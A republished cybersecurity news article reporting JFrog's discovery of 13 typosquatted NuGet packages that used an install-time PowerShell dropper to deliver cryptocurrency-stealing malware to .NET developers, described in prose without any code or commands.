28 C
Mumbai
Thursday, November 30, 2023
HomeCyber AttacksRogue NuGet Packages Infect .NET Developers with cryptocurrency stealer malware

Rogue NuGet Packages Infect .NET Developers with cryptocurrency stealer malware

Date:

Related stories

China-Linked Budworm Targeting Middle Eastern Telco & Asian Government Agencies

China-Linked Budworm Targeting Middle Eastern Telco & Asian Government...

Most Important Cyber Security Tips 2023

Most Important Cyber Security Tips 2023 Important Cyber Security Security...

Every Business Owner 10 Essential Cybersecurity Facts Must Know

Every Business Owner 10 Essential Cybersecurity Facts Must Know In...

New WinRAR Vulnerability Could Allow Hackers to Take Control of Your desktop

New WinRAR Vulnerability Could Allow Hackers to Take Control...

New Attack Campaign Targeting Zimbra Email Users for Credential Theft

New Attack Campaign Targeting Zimbra Email Users for Credential...

Rogue NuGet Packages Infect .NET Developers with cryptocurrency stealer malware

The NuGet repository is the target of a new “sophisticated and highly-malicious attack” aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down.

“The packages contained a PowerShell script that would execute upon installation and trigger a download of a ‘second stage’ payload, which could be remotely executed,” JFrog researchers Natan Nehorai and Brian Moussalli said.

While NuGet packages have been in the past found to contain vulnerabilities and be abused to propagate phishing links, the development marks the first-ever discovery of packages with malicious code.

Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it’s also possible that the threat actors artificially inflated the download counts using bots to make them appear more legitimate.

The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, in which fake packages are assigned names that are similar to legitimate packages, in order to trick developers into downloading them.

The malware incorporated within the software packages functions as a dropper script and is designed to automatically run a PowerShell code that retrieves a follow-on binary from a hard-coded server.

cryptocurrency stealer malware

Related Articles:



As an added obfuscation mechanism, some packages did not embed a malicious payload directly, instead fetching it via another booby-trapped package as a dependency.

Even more troublingly, the connection to the command-and-control (C2) server occurs over HTTP (as opposed to HTTPS), rendering it vulnerable to an adversary-in-the-middle (AiTM) attack.

The second-stage malware is what JFrog describes as a “completely custom executable payload” that can be dynamically switched at will since it’s retrieved from the C2 server.

The malware, written in a low-level language, delivers several capabilities that include a crypto stealer and an auto-updater module that pings the C2 server for an updated version of the malware.

The findings come as the software supply chain has become an increasingly lucrative pathway to compromise developers’ systems and stealthily propagate backdoored code to downstream users.

“This proves that no open source repository is safe from malicious actors,” Shachar Menashe, senior director at JFrog Security Research, said in a statement shared with The Hacker News.

“.NET developers using NuGet are still at high risk of malicious code infecting their environments and should take caution when curating open-source components for use in their builds – and at every step of the software development lifecycle – to ensure the software supply chain remains secure.”

If you found this article interesting? Follow us on facebook & Twitter to read more exclusive content we post.

Technogeek Online
Technogeek Onlinehttps://technogeek.online
Technogeek Online mission is to be a digital for technical decision-makers to gain knowledge about transformative technology. We deliver essential information on cyber technologies and strategies to guide you as you lead your organizations. We are inviting you to become a member of our community.

Subscribe

- Never miss a story with notifications

- Gain full access to our premium content

- Browse free from up to 5 devices at once

Latest stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here